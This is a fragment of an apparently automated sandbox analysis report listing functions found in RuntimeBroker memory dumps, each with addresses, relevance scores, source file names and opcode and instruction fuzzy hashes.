                                                                      • Instruction Fuzzy Hash: CDE0ED6154F3D44FCB16DB7488698557FB0AE6B21074B41DEC185CB1B3D619D949C701
                                                                      Function 00007FFD9B8C3C69 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 6f48a9a80308f86f4229a9ad8f5e5ec023903ab9ee2c8189cea8e4f27d3b734b
                                                                      • Instruction ID: bce0304e481d2b3bbfc9e20c5e8c033dfd0450ece6d9b143f234d6e3b8b93a21
                                                                      • Opcode Fuzzy Hash: 6f48a9a80308f86f4229a9ad8f5e5ec023903ab9ee2c8189cea8e4f27d3b734b
                                                                      • Instruction Fuzzy Hash: CFE0127194F3C48FCB56EB7588658547FB0AE6761074B41EEC085CF1B3D62D9849C701
                                                                      Function 00007FFD9B8C7D19 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 4df0ab70ae7f309628f2faeb7f6dcb5ebb956beb4ff421f67bf74f580f61ea40
                                                                      • Instruction ID: 19cf3b2479bac00445e6717740ed3d6f83370dffcb73bfc4efe64230e81bc516
                                                                      • Opcode Fuzzy Hash: 4df0ab70ae7f309628f2faeb7f6dcb5ebb956beb4ff421f67bf74f580f61ea40
                                                                      • Instruction Fuzzy Hash: A7E01A7154E3C44FCB06AB7488699553FA09E6B21178B41DEC08ACF1B3D62D8949C701
                                                                      Function 00007FFD9B8C1C79 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: I
                                                                      • API String ID: 0-3707901625
                                                                      • Opcode ID: 83dc0d97cbbc427e747160c5e42807c5c195f7ff0b624313fe927a8df981d17d
                                                                      • Instruction ID: c2d69d25213d0432d2159185ff618fdd2896ded8965f33a28b3759c8a94cd7f7
                                                                      • Opcode Fuzzy Hash: 83dc0d97cbbc427e747160c5e42807c5c195f7ff0b624313fe927a8df981d17d
                                                                      • Instruction Fuzzy Hash: 16E01A6154E3C04FCB06EB7884699553FA09E6721178B41EEC04ACF1B3D62D8949C701
                                                                      Function 00007FFD9B8B9391 Relevance: .3, Instructions: 317COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8B3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B3000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8b3000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dbf26c4e06806d87b075aa5f9b7e3f6927c5ee2882cb4e8600cd4b682d7def0d
                                                                      • Instruction ID: e790c313af229ccaaf76326c00d43e3a5980622acf3def36849a5dbe82db6448
                                                                      • Opcode Fuzzy Hash: dbf26c4e06806d87b075aa5f9b7e3f6927c5ee2882cb4e8600cd4b682d7def0d
                                                                      • Instruction Fuzzy Hash: 37A1A430B1891D4FDB58EF68C4A8AB977E1FF98314B5145BAD01DC32D6DF34A9428B81
                                                                      Function 00007FFD9B8C32DD Relevance: .3, Instructions: 282COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 695bf58dcad3b2ffa176bc27ac7997e739e3a4712bcd0d290c4468b986abc135
                                                                      • Instruction ID: c43d3a4a9fd5aa5a09adfb04ddfd371611e8ac63b6831af7cf3d9a73692514a7
                                                                      • Opcode Fuzzy Hash: 695bf58dcad3b2ffa176bc27ac7997e739e3a4712bcd0d290c4468b986abc135
                                                                      • Instruction Fuzzy Hash: 598105A1B1DA4E0FEBACFB6894666B472D2EFA8310F0441BAD40DC71D7DD38AD424741
                                                                      Function 00007FFD9B8C3365 Relevance: .2, Instructions: 198COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 33f15c84c2fd680f3bae6f6cf882f6c6882cfb0d248a16952e27eac4060e7fcc
                                                                      • Instruction ID: e56ff62d38bb639e363580440d66a90cd88d51bd3aee91b11e79c8b81989f4d9
                                                                      • Opcode Fuzzy Hash: 33f15c84c2fd680f3bae6f6cf882f6c6882cfb0d248a16952e27eac4060e7fcc
                                                                      • Instruction Fuzzy Hash: 2651D461B1D94E0FEBACFB6894626B872D2EF98300F04417AD40DC72D6ED39AD424741
                                                                      Function 00007FFD9B890D78 Relevance: .2, Instructions: 188COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c65826bcca9d9dfa3fd03c580d07ea4bbcfee304fa6b030d90d76c3eaa9bccc7
                                                                      • Instruction ID: 1c68c5589e96e9cc42935d6e70148e8a28d04c1ca93ebd8192b94e8c800a5333
                                                                      • Opcode Fuzzy Hash: c65826bcca9d9dfa3fd03c580d07ea4bbcfee304fa6b030d90d76c3eaa9bccc7
                                                                      • Instruction Fuzzy Hash: 8351F372B19A8D4FDB99EF6888257A8BFE1FF99300F4000BAD049C72D6DF7458058741
                                                                      Function 00007FFD9B8908E8 Relevance: .1, Instructions: 133COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c6f3dcce408037af0bfcc1fd562898c8b4b01e48d0de5430fc747db31bd9259e
                                                                      • Instruction ID: 2dbd788af1dd3aa85cb5b020e09f3194dbd01ede1029f73cd545fa5935407d9d
                                                                      • Opcode Fuzzy Hash: c6f3dcce408037af0bfcc1fd562898c8b4b01e48d0de5430fc747db31bd9259e
                                                                      • Instruction Fuzzy Hash: 2731043130D9194FDB68EB5CE88A9B97BD1EF8932131541BBE48AC7176D911EC828781
                                                                      Function 00007FFD9B8CABA8 Relevance: .1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 77ca086e3cd8cdf52df9ef85d9070840f3fdc37664037ff0355794f1a65ea4c6
                                                                      • Instruction ID: dd653d0d13e63900e821e5227ac6d2f6025c552a402d7c5878f6f50722cbd385
                                                                      • Opcode Fuzzy Hash: 77ca086e3cd8cdf52df9ef85d9070840f3fdc37664037ff0355794f1a65ea4c6
                                                                      • Instruction Fuzzy Hash: 2631B3A1B1A94E5FE7A8F75844A66B473D2EB5C300B1501BAE04DC32FBDE387D418340
                                                                      Function 00007FFD9B8C22A8 Relevance: .1, Instructions: 116COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4f39fbe5e13f3fddecbb9d566638e59bda8e9809a092a4723dcf06a8172c27d9
                                                                      • Instruction ID: 08e9675578cf88878c7642785a03198f3f60c18cb9125571b082bb5fb2808d40
                                                                      • Opcode Fuzzy Hash: 4f39fbe5e13f3fddecbb9d566638e59bda8e9809a092a4723dcf06a8172c27d9
                                                                      • Instruction Fuzzy Hash: 1531E372A0D91D4FEB68FF98D8A56F973A1EBA9320F05027BD40DC72E5CE2469458780
                                                                      Function 00007FFD9B890998 Relevance: .1, Instructions: 99COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f69badd837562d6a7787fe83fab1529400a3140a5760580159edf5af0ead2090
                                                                      • Instruction ID: 4c23c61b03706ec3217055906b72ae6a8c95bb9a0be70e26e23258ad6a8c9f1b
                                                                      • Opcode Fuzzy Hash: f69badd837562d6a7787fe83fab1529400a3140a5760580159edf5af0ead2090
                                                                      • Instruction Fuzzy Hash: 78210820B1DD1D0FEB58B76C946AAB9BBD6EB9D311F4500B9E80DC32E7DD24AD414281
                                                                      Function 00007FFD9B89119D Relevance: .1, Instructions: 94COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0f80da5a323964737c8a4a7aeb0d7e873f66da4b4b78e37a01fe5a150a5a8cd4
                                                                      • Instruction ID: 5f3b7a71b56b910d336d2454ae937a9dec20662c300c7b7d2e02161a7fe86c8e
                                                                      • Opcode Fuzzy Hash: 0f80da5a323964737c8a4a7aeb0d7e873f66da4b4b78e37a01fe5a150a5a8cd4
                                                                      • Instruction Fuzzy Hash: 0431A231A0D64E9FDF45EBA8C8689F97BF1FF69300B0505BAC009D72A2DE28A941C740
                                                                      Function 00007FFD9B890C25 Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dd42cd4c6c79ebf97f3fc10ee3b4ce4233919ad0603b2fe168c69bb2f7a02fb6
                                                                      • Instruction ID: 26b371ae5d22925d681d1fefb9f09113c9bfb7e649d808597faecbeb96354945
                                                                      • Opcode Fuzzy Hash: dd42cd4c6c79ebf97f3fc10ee3b4ce4233919ad0603b2fe168c69bb2f7a02fb6
                                                                      • Instruction Fuzzy Hash: 25213736B1E25D8FEB26A7A8AC250DC7F60EF45328F0541F3D058CB1D3D92826469781
                                                                      Function 00007FFD9B8CC998 Relevance: .1, Instructions: 81COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b9e477544a4c968726a80d2dbd9d197da3bd80e56b23f94723c037a00f0124fa
                                                                      • Instruction ID: 4c508cc64923d8b242cd8f958f108acc9519ffe619cd4a584e233ab0088e081e
                                                                      • Opcode Fuzzy Hash: b9e477544a4c968726a80d2dbd9d197da3bd80e56b23f94723c037a00f0124fa
                                                                      • Instruction Fuzzy Hash: 83219272F0451D8BEB64FA99D8547FE73A2EBD8311F018177D009D3298DE39AA4687D0
                                                                      Function 00007FFD9B891B9F Relevance: .1, Instructions: 79COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3e0dd8dc3d9944f5588ff4d58079b1628987fb6bab8c065160020d883808509d
                                                                      • Instruction ID: fec1a2d292ebe15e690a27d3c8d3668cf4e45f7402c3822f2dd18102452d4b2a
                                                                      • Opcode Fuzzy Hash: 3e0dd8dc3d9944f5588ff4d58079b1628987fb6bab8c065160020d883808509d
                                                                      • Instruction Fuzzy Hash: A7214721F1E90E9BEFB4F76884646B866D2EF8C711F5601B5D01ED72F2ED28AE418740
                                                                      Function 00007FFD9B890F90 Relevance: .1, Instructions: 66COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d5c9809f3a0410be4eea41be43fbec306db85c4daeb22f2983730aee099e7075
                                                                      • Instruction ID: 392da37896fa2d5a0b98c5498454cf0554f50703a569376c787364b3a0c5f685
                                                                      • Opcode Fuzzy Hash: d5c9809f3a0410be4eea41be43fbec306db85c4daeb22f2983730aee099e7075
                                                                      • Instruction Fuzzy Hash: 2E212974918AA98EE78CEF28C4697E57FE4E759315F40017FC05AD3AD5CBB50065C740
                                                                      Function 00007FFD9B8A46A4 Relevance: .1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f3bd1f195ef1a9c0cc78143a0064fc346e450b14fc4d87b268a090ba63a62158
                                                                      • Instruction ID: bccbd153dfb8262d5d16e7ccb05e5f97f2d748cf8f34b8b2ff002bac62f20a96
                                                                      • Opcode Fuzzy Hash: f3bd1f195ef1a9c0cc78143a0064fc346e450b14fc4d87b268a090ba63a62158
                                                                      • Instruction Fuzzy Hash: 1E115931A0C65C8FEB74DF58C8102AB3BA1EB89310F02417FD44AC31A2CE34690687E0
                                                                      Function 00007FFD9B8A4668 Relevance: .1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4d016258775c7bd6f01bc4819dcede1ae4c941ce6c35c908d95545f06b7d6414
                                                                      • Instruction ID: de70a3982a2d6725aa7c94b19a372af6e57d28dedabef4f519efdd61ff9361c5
                                                                      • Opcode Fuzzy Hash: 4d016258775c7bd6f01bc4819dcede1ae4c941ce6c35c908d95545f06b7d6414
                                                                      • Instruction Fuzzy Hash: 0801C42260F6C61FEB23477488345A53F715F9765471E41FBC089CB0E3D90C660AC322
                                                                      Function 00007FFD9B890C40 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dff02965e4bb69b985feb6ba3206d7c4126c26d43d9bde4fc1b6d2e1ec2ba544
                                                                      • Instruction ID: f38a2b5c159d21b014f59bb00da816dd5ab370d8c3d035f9dbb82760c4bff89d
                                                                      • Opcode Fuzzy Hash: dff02965e4bb69b985feb6ba3206d7c4126c26d43d9bde4fc1b6d2e1ec2ba544
                                                                      • Instruction Fuzzy Hash: DF11E132E1E38D8FEB12DBA8886019C7FB0EF56714F0641F7D054DB2A2D93866458780
                                                                      Function 00007FFD9B890C48 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ad1686fe9ed4408e77851cfea1247dba21914ade175b6c9789122ef5e64c8279
                                                                      • Instruction ID: d1d94c76d1346f6878fd9981222ae4c27dafc7d87efef206e9d1eafee5ef111e
                                                                      • Opcode Fuzzy Hash: ad1686fe9ed4408e77851cfea1247dba21914ade175b6c9789122ef5e64c8279
                                                                      • Instruction Fuzzy Hash: 7701C031E1E38D8FEB12DBA8886009C7FB0EF06704F0641F7D054DB2A2D93866458780
                                                                      Function 00007FFD9B890C50 Relevance: .0, Instructions: 40COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d1fede52656c878854f6dc3375b7117d7810db6a0738dc4634492ee50b92bf5e
                                                                      • Instruction ID: 32864386d666a27ddef3aa2b539f6f99fe1b8e43b80e78dd5bcfff2e813d6909
                                                                      • Opcode Fuzzy Hash: d1fede52656c878854f6dc3375b7117d7810db6a0738dc4634492ee50b92bf5e
                                                                      • Instruction Fuzzy Hash: B9019E31E1E38D8EEB22DBA8886409C7FB0AF1A704F1541F7D054CB2A2D93866448740
                                                                      Function 00007FFD9B891C2D Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                      • Instruction ID: 81e4882dc4778f48362ee329f6f9474d6999b61f6d868f8e80d67a8a0dd082ef
                                                                      • Opcode Fuzzy Hash: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                      • Instruction Fuzzy Hash: 9BF03134F5E41F9AEFB4A754C8647B87762FF98711F5542B9C00DA31A1DE386A818B40
                                                                      Function 00007FFD9B890B77 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aeb55fb6b84541ad52a460e63665507ded051ad4dd57889e2cd256dd785d0ed0
                                                                      • Instruction ID: a4f239b09f9e580014013dd1df75325c70794e5468312655f167317a617412ae
                                                                      • Opcode Fuzzy Hash: aeb55fb6b84541ad52a460e63665507ded051ad4dd57889e2cd256dd785d0ed0
                                                                      • Instruction Fuzzy Hash: 29F0E53571EA59CFC741AB38DC999D47F60EB47215BAA14FAC08AC7962C220586ECB44
                                                                      Function 00007FFD9B8CA4F9 Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7eababa79df99af95b0ed9d09748bedfedb4831447a6c31983a4362d518fa4ce
                                                                      • Instruction ID: 0f0f96835cc818666733789956ea4040c73a393f41e74abf953420c42cc7dab1
                                                                      • Opcode Fuzzy Hash: 7eababa79df99af95b0ed9d09748bedfedb4831447a6c31983a4362d518fa4ce
                                                                      • Instruction Fuzzy Hash: B7E02B217197C80FC719567948650607BF1DF9B21138A41EBD096C72E3DD18DC458345
                                                                      Function 00007FFD9B891CDA Relevance: .0, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b890000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                      • Instruction ID: eb05ac72acd36fa1e355f1a98ee1d01b38a027b0277aca0ca464e1afbb3de9f5
                                                                      • Opcode Fuzzy Hash: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                      • Instruction Fuzzy Hash: 67F03A21F1E40E9AEFB0E798C8642B83753AF88B11F5642B5C00DA32F1DD28AA428640
                                                                      Function 00007FFD9B8C74D5 Relevance: .0, Instructions: 29COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5ca596a5051adcb12aecd00c26bfb0559bc4b2c3cacb76cd2172605fb1ebf51b
                                                                      • Instruction ID: 1c202315581f056a0c595c2d119a1491104f722a4f260ff0dc900fc09a3281e5
                                                                      • Opcode Fuzzy Hash: 5ca596a5051adcb12aecd00c26bfb0559bc4b2c3cacb76cd2172605fb1ebf51b
                                                                      • Instruction Fuzzy Hash: D7E06D66B0A6844FD71A6A384C758B43B918F6A22A75A04A7D046CF6F3D8159D498311
                                                                      Function 00007FFD9B8CA0C9 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b0e44bbecd300ad20b089d6244668327e679081352e854c6e8b050764f737780
                                                                      • Instruction ID: d76dacb5a0c33f858fc90aff7325f76d3a893c3448b8a1d9d1efb4bb65bbfee3
                                                                      • Opcode Fuzzy Hash: b0e44bbecd300ad20b089d6244668327e679081352e854c6e8b050764f737780
                                                                      • Instruction Fuzzy Hash: DBE01220709B884FC70DA66948695647BB1EFAA21278A52DBC045CB6A3EE19DC85C741
                                                                      Function 00007FFD9B8A3EB8 Relevance: .0, Instructions: 28COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8a0000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 595fd9dc68d37cc5d343033b8a2a0fe4daa7abed56c0c195b6aef102e90417d8
                                                                      • Instruction ID: 92a1744d36fd346c122ccba0ef2c5f38f9e0572facd2ade5e07c5ae18b21de02
                                                                      • Opcode Fuzzy Hash: 595fd9dc68d37cc5d343033b8a2a0fe4daa7abed56c0c195b6aef102e90417d8
                                                                      • Instruction Fuzzy Hash: B9F0BE31A0450E8BFB18EB80C8619BD73A5FB54300F400239C4269B2E8DEB46A018780
                                                                      Function 00007FFD9B8CA589 Relevance: .0, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B8C1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8C1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffd9b8c1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 95a90a4cb7e9b901fa3b5f7eb8dd5f2ebdc6149690c51b9f8f2418de34e328b5
                                                                      • Instruction ID: be2653dae989573074bf913477c8499db98a35f19379fc432810422f359cbcf1
                                                                      • Opcode Fuzzy Hash: 95a90a4cb7e9b901fa3b5f7eb8dd5f2ebdc6149690c51b9f8f2418de34e328b5
                                                                      • Instruction Fuzzy Hash: 72E08C2160AB844FC70EA7288CA99503BB1EFAB21278A40DBC005CB6B3EA1DCC49C741
                                                                      Function 00007FFD9B8942E9 Relevance: .0, Instructions: 23COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.2998629871.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
